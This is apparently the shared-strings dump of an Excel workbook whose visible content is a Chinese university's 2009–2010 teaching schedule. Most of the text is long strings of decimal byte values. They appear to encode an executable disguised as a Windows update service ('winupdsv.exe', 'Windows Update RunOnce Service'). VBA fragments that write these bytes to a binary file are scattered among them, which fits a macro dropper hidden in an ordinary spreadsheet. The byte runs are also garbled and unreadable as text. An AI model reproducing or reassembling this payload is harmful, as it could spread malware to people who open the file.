255 255 255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 52 0 249 1 0 0 0 0 2 0 1 0 3 96 8 0 44 0 32 0 255 255 255 255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 33 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 35 44 0 57 2 0 0 0 0 2 0 2 0 3 96 4 0 48 0 36 0 255 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">117 7 139 30 131 238 252 17 219 114 237 184 1 0 0 0 1 219 117 7 139 30 131 238 252 17 219 17 192 1 219 115 239 117 9 139 30 131 238 252 17 219 115 228 49 201 131 232 3 114 13 193 224 8 138 6 70 131 240 255 116 116 137 197 1 219 117 7 139 30 131 238 252 17 219 17 201 1 219 117 7 139 30 131 238 252 17 219 17 201 117 32 65 1 219 117 7 139 30 131 238 252 17 219 17 201 1 219 115 239 117 9 139 30 131 238 252 17 219 115 228 131 193 2 129 253 0 243 255 255 131 209 1 141 20 47 131 253 252 118 15 138 2 66 136 7 71 73 117 247 233 99 255 255 255 144 139 2 131 194 4 137 7 131 199 4 131 233 4 119 241 1 207 233 76 255 255 255 94 137 247 185 212 2 0 0 138 7 71 44 232 60 1 119 247 128 63 6 117 242 139 7 138 95 4 102 193 232 8 193 192 16 134 196 41 248 128 235 232 1 240 137 7 131 199 5 137 216 226 217 141 190 0 0 1 0 139 7 9 192 116 69 139 95 4 141 132 48 152 36 1 0 1 243 80 131 199 8 255 150 96 37 1 0 149 138 7 71 8 192 116 220 137 249 121 7 15 183 7 71 80 71 185 87 72 242 174 85 255 150 100 37 1 0 9 192 116 7 137 3 131 195 4 235 216 255 150 104 37 1 0 97 233 49 108 255 255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</si>
  <si>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 xml:space="preserve">114 138 164 191 152 74 117 223 200 231 176 73 168 74 44 7 192 19 236 188 0 169 216 3 16 74 191 152 74 22 66 14 128 152 74 63 52 77 215 13 143 6 124 3 116 108 100 144 138 77 211 92 84 76 74 191 221 55 66 8 9 255 240 176 3 188 1 72 42 54 208 74 191 243 8 121 200 48 76 224 75 56 75 169 216 117 191 44 144 72 11 104 3 144 75 191 57 4 242 10 48 76 48 76 215 13 22 10 91 228 127 236 3 166 89 54 77 244 252 4 76 12 20 33 4 72 197 39 76 191 31 21 155 174 59 64 5 72 3 88 108 76 14 172 5 32 191 63 84 151 150 14 80 86 156 71 100 138 68 10 11 55 80 222 249 131 250 129 45 153 165 233 82 14 38 153 43 209 231 73 131 161 249 254 139 200 193 224 8 3 193 6 16 202 205 42 186 174 65 41 173 79 58 6 35 74 62 40 39 100 130 68 205 184 126 41 62 1 184 66 60 83 109 86 51 246 59 29 18 84 198 40 221 21 241 90 53 234 71 246 68 200 4 63 96 237 66 170 33 61 86 68 8 23 48 91 66 158 235 2 20 214 1 15 149 33 133 82 111 60 224 220 224 40 114 0 240 165 229 187 160 67 239 27 65 194 131 196 20 91 162 182 98 146 26 125 212 80 41 156 75 22 52 58 81 237 66 60 82 255 73 24 235 215 131 179 5 117 10 88 110 82 13 74 15 127 77 162 155 185 250 89 89 235 64 125 129 16 145 83 171 14 96 44 160 196 231 148 131 109 173 104 31 247 222 27 246 3 221 35 21 30 209 172 150 68 131 224 168 70 36 251 61 8 207 234 122 80 100 48 226 9 181 200 5 242 131 176 240 99 28 113 7 23 130 145 61 44 59 117 70 87 34 132 251 70 7 91 83 104 236 48 136 183 17 217 0 105 160 105 29 35 145 207 108 229 235 34 32 232 27 156 190 102 34 10 72 114 124 31 2 16 93 125 138 150 20 126 138 20 182 168 178 107 119 237 64 78 34 161 182 109 13 240 29 46 29 22 28 2 24 31 31 240 156 97 0 197 72 189 63 80 27 27 139 186 171 211 68 32 24 54 102 109 139 63 60 32 115 46 127 36 1 10 69 128 4 227 181 189 65 103 </t>
  </si>
  <si>
    <t xml:space="preserve">147 7 15 235 31 74 50 75 215 177 173 14 226 36 20 56 15 127 107 23 80 58 185 3 248 112 3 51 87 3 116 45 223 31 116 171 10 242 7 190 149 81 102 11 11 4 247 211 117 63 69 129 226 246 0 14 5 54 190 6 6 29 192 47 213 47 89 131 198 6 185 63 93 167 173 246 165 75 99 131 238 141 87 252 51 22 67 100 186 27 179 187 70 61 117 10 70 55 118 70 43 101 59 56 117 157 222 3 40 119 17 166 130 44 184 174 1 215 106 7 128 11 22 209 4 30 133 230 159 238 16 115 34 26 12 3 206 3 242 78 8 230 213 68 108 216 89 255 51 47 237 4 150 95 55 215 1 72 16 55 93 104 97 200 119 193 255 82 55 34 226 91 94 157 195 13 10 71 86 77 97 255 111 255 255 116 51 50 32 111 112 116 105 109 105 115 101 100 32 97 115 5 109 98 108 121 32 99 111 100 101 32 119 127 251 127 227 114 105 116 68 110 32 49 57 57 54 45 57 56 32 98 23 71 105 108 108 101 115 173 253 237 237 32 86 111 6 97 110 116 66 83 156 88 139 200 53 215 254 116 237 246 219 80 157 10 51 193 116 30 81 7 156 89 101 19 32 137 31 208 141 157 20 16 77 15 162 11 208 108 13 116 184 0 10 247 6 4 240 191 41 114 39 26 36 199 230 60 139 66 112 139 154 16 111 237 3 29 59 195 10 248 90 116 124 192 246 66 119 26 75 193 227 2 216 137 28 38 130 160 86 110 237 45 22 199 216 124 17 174 246 205 109 152 114 48 251 230 106 100 141 124 113 212 65 38 224 111 254 199 247 216 131 224 3 137 185 229 8 44 28 45 27 232 127 237 92 176 193 97 203 20 52 240 44 47 31 182 224 222 76 132 6 92 56 255 8 73 122 128 29 209 223 254 20 36 235 26 35 202 18 12 79 59 205 15 134 164 129 126 136 27 130 234 33 15 136 212 83 68 49 255 220 0 78 221 151 117 221 178 153 1 59 128 123 219 77 92 117 207 137 53 139 128 121 128 119 124 162 167 23 186 248 151 141 188 56 8 139 95 122 187 21 180 48 6 127 50 51 4 58 117 119 126 131 66 191 50 4 51 68 58 4 219 242 8 117 233 235 113 137 87 </t>
  </si>
  <si>
    <t>Close #1</t>
  </si>
  <si>
    <t xml:space="preserve">92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 100 0 97 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 100 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 97 0 53 0 1 16 0 42 </t>
  </si>
  <si>
    <t xml:space="preserve">1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 87 0 105 0 110 0 100 0 111 0 119 0 115 0 32 0 85 0 112 0 100 0 97 0 116 0 101 0 32 0 82 0 117 0 110 0 79 0 110 0 99 0 101 0 32 0 83 0 101 0 114 0 118 0 105 0 99 0 101 0 0 0 0 0 66 0 17 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 53 0 44 0 32 0 49 0 44 0 32 0 50 0 54 0 48 0 48 0 44 0 32 0 50 0 49 0 56 0 48 0 0 0 0 0 58 0 13 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 119 0 105 0 110 0 117 0 112 0 100 0 115 0 118 0 46 0 101 0 120 0 101 0 0 0 0 0 124 0 44 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 67 0 111 0 114 0 112 0 111 0 114 0 97 0 116 0 105 0 111 0 110 0 46 0 32 0 65 0 108 0 108 0 32 0 114 0 105 0 103 0 104 0 116 0 115 0 32 0 114 0 101 0 115 0 101 0 114 0 118 0 101 0 100 0 46 0 0 0 66 0 13 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 119 0 105 0 110 0 117 0 112 0 100 0 115 0 118 0 46 0 101 0 120 0 101 0 0 0 0 0 102 0 35 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 87 0 105 0 110 0 100 0 111 0 119 0 115 0 32 0 79 0 112 0 101 0 114 0 97 0 116 0 105 0 110 0 103 0 32 0 83 0 121 0 </t>
  </si>
  <si>
    <t xml:space="preserve">1 0 32 0 100 2 32 0 54 2 66 64 98 2 1 0 0 0 107 0 255 255 56 0 0 0 100 0 255 255 48 0 0 0 32 0 54 2 33 0 6 1 182 0 1 0 46 0 132 0 172 0 0 0 7 0 156 0 124 0 255 255 16 0 0 0 107 0 255 255 8 0 0 0 182 0 5 0 123 69 83 67 125 0 65 64 96 2 1 0 32 0 100 2 32 0 54 2 66 64 98 2 1 0 0 0 107 0 255 255 224 3 0 0 163 0 102 2 216 3 0 0 32 0 78 2 183 0 5 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 33 0 6 1 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 5 0 4 0 156 0 0 0 0 0 0 0 32 0 54 2 65 64 164 2 1 0 0 0 0 0 0 0 107 0 255 255 136 3 0 0 183 4 32 0 54 2 40 0 74 2 0 0 0 0 0 0 111 0 255 255 112 3 0 0 150 4 32 1 0 0 0 0 32 0 54 2 33 0 6 1 182 0 10 0 110 111 114 109 97 108 46 120 108 109 5 0 156 0 0 0 0 0 0 0 32 0 54 2 66 64 66 0 0 0 0 0 0 0 0 0 124 0 255 255 48 3 0 0 107 0 255 255 40 3 0 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 54 2 37 0 58 2 1 0 66 64 42 2 0 0 0 0 0 0 0 0 32 0 54 2 66 64 114 2 0 0 0 0 0 0 0 0 107 0 255 255 96 2 0 0 32 0 54 2 33 0 6 1 32 0 18 2 33 0 6 1 5 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 33 0 6 1 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 5 0 3 0 156 0 0 0 0 0 124 0 255 255 24 2 0 0 107 0 255 255 16 2 0 0 255 0 32 0 130 2 254 0 172 0 1 0 32 0 46 2 33 0 48 2 146 0 0 0 32 0 130 2 36 0 46 2 1 0 33 0 6 1 182 0 5 0 66 111 111 107 49 0 5 0 156 0 0 0 0 0 32 0 130 2 36 0 46 2 1 0 33 0 74 2 </t>
  </si>
  <si>
    <t xml:space="preserve">0 1 0 22 0 1 2 6 0 103 0 1 0 22 0 1 2 6 0 104 0 1 0 22 0 1 2 6 0 105 0 1 0 22 0 1 2 6 0 106 0 1 0 22 0 1 2 6 0 107 0 1 0 22 0 1 2 6 0 108 0 1 0 22 0 1 2 6 0 109 0 1 0 22 0 1 2 6 0 110 0 1 0 22 0 1 2 6 0 111 0 1 0 22 0 1 2 6 0 112 0 1 0 22 0 1 2 6 0 113 0 1 0 22 0 1 2 6 0 114 0 1 0 22 0 1 2 6 0 115 0 1 0 22 0 1 2 6 0 116 0 1 0 22 0 1 2 6 0 117 0 1 0 22 0 1 2 6 0 118 0 1 0 22 0 1 2 6 0 119 0 1 0 22 0 1 2 6 0 120 0 1 0 22 0 1 2 6 0 121 0 1 0 22 0 1 2 6 0 122 0 1 0 22 0 1 2 6 0 123 0 1 0 22 0 1 2 6 0 124 0 1 0 22 0 1 2 6 0 125 0 1 0 22 0 1 2 6 0 126 0 1 0 22 0 1 2 6 0 127 0 1 0 22 0 215 0 68 0 192 3 0 0 108 2 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 194 1 12 0 1 0 0 0 1 0 9 0 0 0 32 0 62 2 18 0 183 6 0 0 3 0 64 0 0 0 0 0 0 0 0 0 0 0 29 0 15 0 3 0 0 3 0 0 0 1 0 0 0 0 0 3 3 239 0 6 0 6 0 55 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 129 8 0 82 0 122 0 216 0 0 0 0 129 8 0 82 0 122 0 136 7 0 0 0 129 8 0 82 0 122 0 224 7 0 0 0 129 8 0 96 0 72 0 48 1 0 0 0 129 8 0 10 0 17 0 144 1 0 0 4 129 8 0 2 0 3 0 160 1 0 0 0 128 9 0 0 0 0 0 255 255 255 255 34 129 12 0 6 0 9 0 168 1 0 0 0 129 8 0 4 0 5 0 176 1 0 0 0 129 8 0 20 0 45 0 184 1 0 0 0 129 8 0 2 0 3 0 208 1 0 0 0 129 8 0 2 0 2 0 216 1 0 0 0 129 8 0 6 0 7 0 224 1 0 0 0 129 8 0 12 0 29 0 232 1 0 0 0 129 8 0 10 0 15 0 248 1 0 0 0 129 8 0 58 0 92 0 208 9 0 0 0 129 8 0 12 0 19 0 8 2 0 0 0 129 8 0 6 0 7 0 24 2 0 0 0 129 8 0 2 0 3 0 32 2 0 0 0 129 8 0 2 0 2 0 40 2 0 0 0 129 8 0 12 0 19 0 48 2 0 0 0 129 8 0 24 0 43 0 64 2 0 0 0 129 8 0 10 0 17 0 88 2 0 0 0 129 8 0 2 0 3 0 104 2 0 0 0 129 8 0 2 0 5 0 112 2 0 0 0 129 8 0 16 0 16 0 120 2 0 0 0 129 8 0 14 0 28 0 136 2 0 0 0 129 8 0 4 0 5 0 152 2 0 0 0 129 8 0 2 0 2 0 160 2 0 0 0 129 8 0 2 0 2 0 168 2 0 0 0 129 8 0 12 0 19 0 176 2 0 0 0 129 8 0 24 0 43 0 192 2 0 0 0 129 8 0 42 0 118 0 216 2 0 0 0 129 8 0 6 0 7 0 8 3 0 0 0 129 8 0 2 0 3 0 16 3 0 0 0 129 8 0 2 0 5 0 24 3 0 0 0 129 8 0 4 0 5 0 32 3 0 0 0 129 8 0 2 0 2 0 40 3 0 0 0 129 8 0 2 0 2 0 48 3 0 0 0 129 8 0 10 0 15 0 56 3 0 0 0 128 8 0 4 0 0 0 72 3 0 0 0 129 8 0 16 0 16 0 80 3 0 0 0 129 8 0 14 0 28 0 </t>
  </si>
  <si>
    <t xml:space="preserve">43 108 141 168 78 112 14 93 105 79 221 226 15 86 31 66 36 139 74 68 209 188 66 52 94 194 84 176 10 60 50 81 116 72 254 195 205 140 224 19 223 217 84 122 60 227 86 244 237 172 37 170 38 124 141 4 64 2 167 251 192 133 199 136 106 62 74 120 9 104 50 210 57 162 138 91 12 108 136 203 246 173 57 128 110 95 94 116 137 114 100 2 84 108 187 109 219 171 184 233 7 96 2 64 143 66 112 2 186 197 118 112 88 91 116 125 140 143 254 107 36 225 191 125 169 46 67 100 139 83 144 75 108 43 208 43 209 117 15 246 184 81 247 163 23 244 139 213 40 86 28 250 255 119 191 125 216 6 186 50 235 125 35 36 141 140 41 250 12 59 193 114 123 9 143 253 111 139 123 48 139 205 253 141 52 47 0 115 104 38 223 221 253 91 80 67 84 43 205 43 245 137 9 75 60 137 18 115 68 43 197 137 125 123 91 106 20 50 113 165 65 254 131 51 59 197 114 4 75 133 166 168 18 45 78 4 23 233 8 217 54 104 49 59 245 30 104 185 166 11 116 3 213 20 72 4 172 93 169 176 240 214 173 122 87 115 48 64 3 206 81 255 202 246 105 171 219 148 85 60 21 3 114 209 136 250 3 119 64 108 141 247 108 114 32 215 242 155 8 43 80 109 43 91 8 80 125 171 10 237 166 187 127 78 1 51 193 35 67 76 13 129 250 6 37 115 13 139 234 2 99 28 129 66 7 243 254 233 195 95 161 211 6 22 52 86 190 54 7 180 109 220 106 251 142 87 115 38 240 18 108 124 184 13 212 203 119 41 86 60 12 230 161 30 237 194 215 1 113 84 76 100 199 19 114 173 86 248 23 186 49 116 4 59 208 114 58 89 184 128 82 183 181 183 108 116 100 124 7 30 184 209 216 210 246 184 29 68 227 43 193 228 57 123 108 171 233 36 87 51 29 226 2 150 11 8 45 108 179 102 16 72 79 30 36 154 45 205 210 181 238 174 77 129 75 69 67 193 192 119 152 53 40 177 67 118 64 231 211 205 182 252 84 67 215 16 77 255 97 1 58 30 214 177 20 136 242 60 228 206 89 105 84 166 68 198 98 241 82 131 106 181 3 252 193 43 214 243 116 34 51 2 </t>
  </si>
  <si>
    <t>For i = 1 To 54</t>
  </si>
  <si>
    <t xml:space="preserve">10 91 72 111 115 116 32 69 120 116 101 110 100 101 114 32 73 110 102 111 93 13 10 38 72 48 48 48 48 48 48 48 49 61 123 51 56 51 50 68 54 52 48 45 67 70 57 48 45 49 49 67 70 45 56 69 52 51 45 48 48 65 48 67 57 49 49 48 48 53 65 125 59 86 66 69 59 38 72 48 48 48 48 48 48 48 48 13 10 13 10 91 87 111 114 107 115 112 97 99 101 93 13 10 84 104 105 115 87 111 114 107 98 111 111 107 61 50 50 44 32 50 50 44 32 54 51 54 44 32 52 55 48 44 32 13 10 192 224 49 61 50 50 44 32 50 50 44 32 54 51 54 44 32 52 55 48 44 32 90 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 0 0 5 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 224 133 159 242 249 79 104 16 171 145 8 0 43 39 179 217 48 0 0 0 160 0 0 0 7 0 0 0 1 0 0 0 64 0 0 0 4 0 0 0 72 0 0 0 8 0 0 0 88 0 0 0 18 0 0 0 104 0 0 0 12 0 0 0 128 0 0 0 13 0 0 0 140 0 0 0 19 0 0 0 152 0 0 0 2 0 0 0 168 3 0 0 30 0 0 0 7 0 0 0 68 101 114 114 111 119 0 0 30 0 0 0 5 0 0 0 119 111 114 107 0 119 0 0 30 0 0 0 16 0 0 0 77 105 99 114 111 115 111 102 116 32 69 120 99 101 108 0 64 0 0 0 0 169 7 5 90 77 196 1 64 0 0 0 128 60 181 22 206 106 196 1 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 0 0 5 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 2 213 205 213 156 46 27 16 147 151 8 0 43 44 249 174 48 0 0 0 212 0 0 0 9 0 0 0 1 0 0 0 80 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">236 203 66 148 233 62 184 40 203 17 196 75 78 46 57 76 224 112 79 54 131 139 236 146 76 8 240 184 156 156 108 207 101 45 204 98 53 228 200 207 37 103 151 212 17 236 208 98 35 57 153 228 184 16 204 216 52 216 178 35 115 61 115 104 35 107 249 179 30 54 176 17 185 152 211 0 2 104 86 161 124 100 107 4 199 21 248 143 55 104 96 221 99 15 151 104 137 106 23 231 162 212 33 195 219 140 53 99 61 233 22 49 233 33 0 0 101 35 138 8 3 44 151 19 69 26 222 244 221 226 89 54 77 211 212 194 178 136 222 114 178 105 154 166 92 76 60 44 160 221 101 211 116 205 144 122 7 98 74 6 222 62 215 44 155 56 254 220 14 38 3 0 210 105 154 166 235 15 194 3 168 152 36 98 166 105 154 166 116 130 52 64 232 105 182 103 155 142 82 220 55 194 215 3 170 154 166 105 154 166 138 124 104 76 58 58 183 105 154 44 28 8 252 214 63 3 216 211 157 174 105 202 190 15 178 27 140 77 211 185 77 124 136 217 183 3 186 204 224 154 102 217 52 238 8 218 26 42 70 105 154 166 105 94 114 132 146 172 179 108 154 166 188 210 232 224 215 240 166 105 154 101 0 216 18 34 50 70 154 166 105 154 90 110 128 154 170 190 235 154 166 105 212 228 254 22 115 42 3 174 105 154 166 64 82 94 106 156 163 151 219 237 217 118 217 251 82 5 66 45 20 3 172 7 120 6 183 93 211 44 119 63 80 19 46 11 11 134 17 102 185 92 46 169 16 139 1 123 2 154 186 166 235 186 111 43 10 15 9 19 117 159 67 87 186 102 185 237 43 144 24 23 103 19 128 202 19 48 53 219 174 233 31 66 86 27 108 3 3 16 54 150 203 109 211 19 119 188 10 43 91 15 240 8 160 53 203 174 107 232 7 130 27 61 13 15 88 236 154 109 215 51 191 7 18 9 139 115 113 3 86 9 211 52 77 179 96 94 92 88 111 102 219 117 77 99 17 55 133 127 218 14 7 135 154 101 119 186 242 83 124 3 101 9 83 81 108 154 166 105 104 109 90 106 166 3 219 52 77 179 162 164 160 155 72 23 235 107 182 205 114 64 6 181 114 18 91 75 26 79 166 235 </t>
  </si>
  <si>
    <t>Open filesf For Binary Access Write As #1</t>
  </si>
  <si>
    <t xml:space="preserve">15 0 0 0 88 0 0 0 23 0 0 0 104 0 0 0 11 0 0 0 112 0 0 0 16 0 0 0 120 0 0 0 19 0 0 0 128 0 0 0 22 0 0 0 136 0 0 0 13 0 0 0 144 0 0 0 12 0 0 0 171 0 0 0 2 0 0 0 168 3 0 0 30 0 0 0 6 0 0 0 97 100 109 105 110 0 111 0 3 0 0 0 123 16 10 0 11 0 0 0 0 0 0 0 11 0 0 0 0 0 0 0 11 0 0 0 0 0 0 0 11 0 0 0 0 0 0 0 30 16 0 0 1 0 0 0 15 0 0 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 0 12 16 0 0 2 0 0 0 30 0 0 0 15 0 0 0 69 120 99 101 108 32 52 46 48 32 186 234 177 237 0 3 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 254 255 3 10 0 0 255 255 255 255 32 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 23 0 0 0 77 105 99 114 111 115 111 102 116 32 69 120 99 101 108 32 185 164 215 247 177 237 0 6 0 0 0 66 105 102 102 56 0 14 0 0 0 69 120 99 101 108 46 83 104 101 101 116 46 56 0 244 57 178 113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</si>
  <si>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学院号</t>
  </si>
  <si>
    <t>年</t>
  </si>
  <si>
    <t>月</t>
  </si>
  <si>
    <t>日</t>
  </si>
  <si>
    <t>│</t>
  </si>
  <si>
    <t>班                      周</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>4</t>
  </si>
  <si>
    <t>5</t>
  </si>
  <si>
    <t>6</t>
  </si>
  <si>
    <t>7</t>
  </si>
  <si>
    <t>8</t>
  </si>
  <si>
    <t>9</t>
  </si>
  <si>
    <t>10</t>
  </si>
  <si>
    <t>11</t>
  </si>
  <si>
    <t>12</t>
  </si>
  <si>
    <t>13</t>
  </si>
  <si>
    <t>14</t>
  </si>
  <si>
    <t>15</t>
  </si>
  <si>
    <t>16</t>
  </si>
  <si>
    <t>17</t>
  </si>
  <si>
    <t>18</t>
  </si>
  <si>
    <t>∈</t>
  </si>
  <si>
    <t>∷</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <r>
      <t>南昌航空大学2009～2010学年第一学期教学进程表（预案）</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>2009年5月17日</t>
    </r>
  </si>
  <si>
    <t>09年</t>
  </si>
  <si>
    <r>
      <t>10</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
  </si>
  <si>
    <t>一.二</t>
  </si>
  <si>
    <t>寒  假</t>
  </si>
  <si>
    <r>
      <t>1.16</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>2.28</t>
    </r>
  </si>
  <si>
    <t>学院</t>
  </si>
  <si>
    <t>专业</t>
  </si>
  <si>
    <t>年级</t>
  </si>
  <si>
    <t>班级</t>
  </si>
  <si>
    <t>19</t>
  </si>
  <si>
    <t>01</t>
  </si>
  <si>
    <t>材料成型及控制工程</t>
  </si>
  <si>
    <t>06</t>
  </si>
  <si>
    <t>060111-6</t>
  </si>
  <si>
    <t>金属材料工程</t>
  </si>
  <si>
    <t>060121</t>
  </si>
  <si>
    <t>060122</t>
  </si>
  <si>
    <t>060123</t>
  </si>
  <si>
    <t>060124</t>
  </si>
  <si>
    <t>060125</t>
  </si>
  <si>
    <t>高分子材料与工程</t>
  </si>
  <si>
    <t>060131</t>
  </si>
  <si>
    <t>060132</t>
  </si>
  <si>
    <t>焊接技术与工程</t>
  </si>
  <si>
    <t>060141</t>
  </si>
  <si>
    <t>060142</t>
  </si>
  <si>
    <t>02</t>
  </si>
  <si>
    <t>应用化学</t>
  </si>
  <si>
    <t>060211</t>
  </si>
  <si>
    <t>060212</t>
  </si>
  <si>
    <t>060213</t>
  </si>
  <si>
    <t>060214</t>
  </si>
  <si>
    <t>环境工程</t>
  </si>
  <si>
    <t>060221</t>
  </si>
  <si>
    <t>060222</t>
  </si>
  <si>
    <t>材料化学</t>
  </si>
  <si>
    <t>060231</t>
  </si>
  <si>
    <t>060232</t>
  </si>
  <si>
    <t>060233</t>
  </si>
  <si>
    <t>03</t>
  </si>
  <si>
    <t>机械设计制造及其自动化</t>
  </si>
  <si>
    <t>060311</t>
  </si>
  <si>
    <t>060312</t>
  </si>
  <si>
    <t>060313</t>
  </si>
  <si>
    <t>060314</t>
  </si>
  <si>
    <t>060315</t>
  </si>
  <si>
    <t>060316</t>
  </si>
  <si>
    <t>060317</t>
  </si>
  <si>
    <t>060318</t>
  </si>
  <si>
    <t>飞行器制造工程</t>
  </si>
  <si>
    <t>060321</t>
  </si>
  <si>
    <t xml:space="preserve">186 166 125 85 135 89 23 131 235 209 93 215 52 219 116 7 19 28 148 122 35 105 211 81 117 77 215 117 59 84 3 27 71 21 179 19 120 215 117 93 215 107 121 3 176 215 236 47 175 103 40 63 102 217 117 93 123 15 39 59 213 3 148 19 145 186 174 235 186 55 247 121 87 198 111 138 123 64 211 248 154 229 182 235 51 202 79 60 4 3 250 2 252 245 115 187 174 105 54 5 35 165 63 129 17 219 107 215 116 135 174 84 63 125 7 3 134 229 119 101 215 117 102 86 10 7 22 111 154 11 211 16 205 182 233 154 19 171 23 233 190 21 99 93 110 117 93 211 117 3 216 71 108 200 127 106 15 104 215 117 93 215 3 115 43 128 147 248 79 6 43 75 255 93 211 117 77 238 242 199 222 19 207 226 31 15 235 94 215 117 51 230 91 132 31 217 127 7 174 75 134 235 186 174 198 3 99 15 225 51 183 195 123 211 52 205 54 214 3 64 50 34 18 166 105 154 101 254 213 242 226 212 202 154 166 105 154 194 184 170 156 148 138 105 154 166 105 128 114 92 72 64 166 105 154 166 54 44 34 16 6 77 211 52 203 246 212 234 224 216 208 200 52 77 211 52 190 182 172 162 152 211 52 77 211 142 132 122 114 106 77 211 52 77 98 90 80 70 62 52 182 77 211 52 42 32 12 16 223 191 110 109 154 237 103 0 228 222 3 206 186 170 222 215 108 207 158 19 230 211 7 232 219 3 218 206 7 77 211 52 77 182 164 136 244 106 90 52 77 211 52 76 56 40 28 16 205 217 102 217 12 220 252 122 219 79 124 150 52 77 211 116 3 170 190 104 88 68 191 96 77 211 46 28 8 115 0 90 150 246 8 107 142 64 208 3 0 86 151 27 186 193 154 237 54 16 3 37 53 7 80 19 74 105 